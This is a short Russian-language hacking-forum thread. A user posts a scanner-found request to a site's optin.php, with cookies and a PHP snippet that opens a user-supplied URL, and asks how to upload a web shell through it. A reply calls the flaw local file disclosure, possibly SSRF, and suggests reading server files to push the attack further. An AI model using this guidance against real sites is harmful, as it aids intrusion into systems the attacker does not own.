![]() |
Окунь нашел File inclusion,через эту уязвимость можно залить шел?
как это можно сделать на данном примере?помогите разобраться POST /optin.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: _icl_current_language=en;wordpress_test_cookie=WP+ Cookie+check;wp-settings-0=+;wp-settings-time-0=+;wp-postpass_92fbf3142039a9350f471c96df=%24P%24BsFL3O3 mDUQjco83mZ%2FRu%2Fc4mUhjj0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Content-Length: 112 Host: сайт.ком User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Connection: Keep-alive 26241823=289&OptinFormID=5&UEmail=sample%40email.t st&field32=yes&field34=0&field6=GRLpGpAG&forward_u rl=optin.php -------------------------------------------- array( 'method' => 'POST', 'content' => http_build_query($_POST) ) ); $ctx = stream_context_create($params); $fp = @fopen($url, 'rb', false, $ctx); if ($fp) { echo @stream_get_contents($fp); die(); } } header('Location: https://******.**'); die(); |
Это не инклуд, а LFD или, в простонародье, читалка (Local File Disclosure). Так как контролируется весь параметр $url, можно и в SSRF, но раз это окунь нашёл, то думаю оператору окуня это ни о чём не скажет Так вот, конкретно через эту уязвимость залиться нельзя, но можно почитать другие файлы на сервере и продолжить атаку через них.
|
| Время: 10:25 |